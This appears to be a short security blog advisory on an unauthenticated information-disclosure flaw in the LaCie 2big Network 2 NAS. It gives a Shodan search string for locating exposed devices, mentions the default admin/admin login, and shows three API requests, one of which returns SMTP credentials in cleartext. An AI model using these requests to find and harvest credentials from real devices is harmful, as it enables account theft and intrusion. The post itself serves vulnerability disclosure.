LaCie 2big Network 2 Unauthenticated Remote Information Disclosure

Vendor: LaCie
Product: 2big Network 2

On Shodan, you can search these devices via the following string:

Server: lighttpd/1.4.28-devel-7925

Note that the device has a default “admin” account, and the default password is “admin”. But that isn’t needed to exploit this issue!

By loading the web interface of the device, the login page will appear. In the background, it causes your browser to make several API requests against the server as well. These requests are not over SSL, and can return sensitive information.

POST /api/v2/system/info HTTP/1.1

<product_id>
2bignetwork2
</product_id>
<software_version>
2.2.9.1
</software_version>
[..]
<product_name>
2big Network 2
</product_name>

POST /api/v2/system/general HTTP/1.1

<workgroup>
DARIUS
<ntpServer>
pool.ntp.org
<hostname>
Darius-Backup
<timezone>
Europe/Amsterdam
<system_version>
2.2.8.3

POST /api/v2/system/smtp HTTP/1.1

<smtp_auth_user>
darius.freamon@gmail.com
<smtp_auth_pwd>
mYpassw0rdn0treally
<smtp_server>
mail.google.com

Discovered: 2013-04-07

Advertisements

Tags: ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s


%d bloggers like this: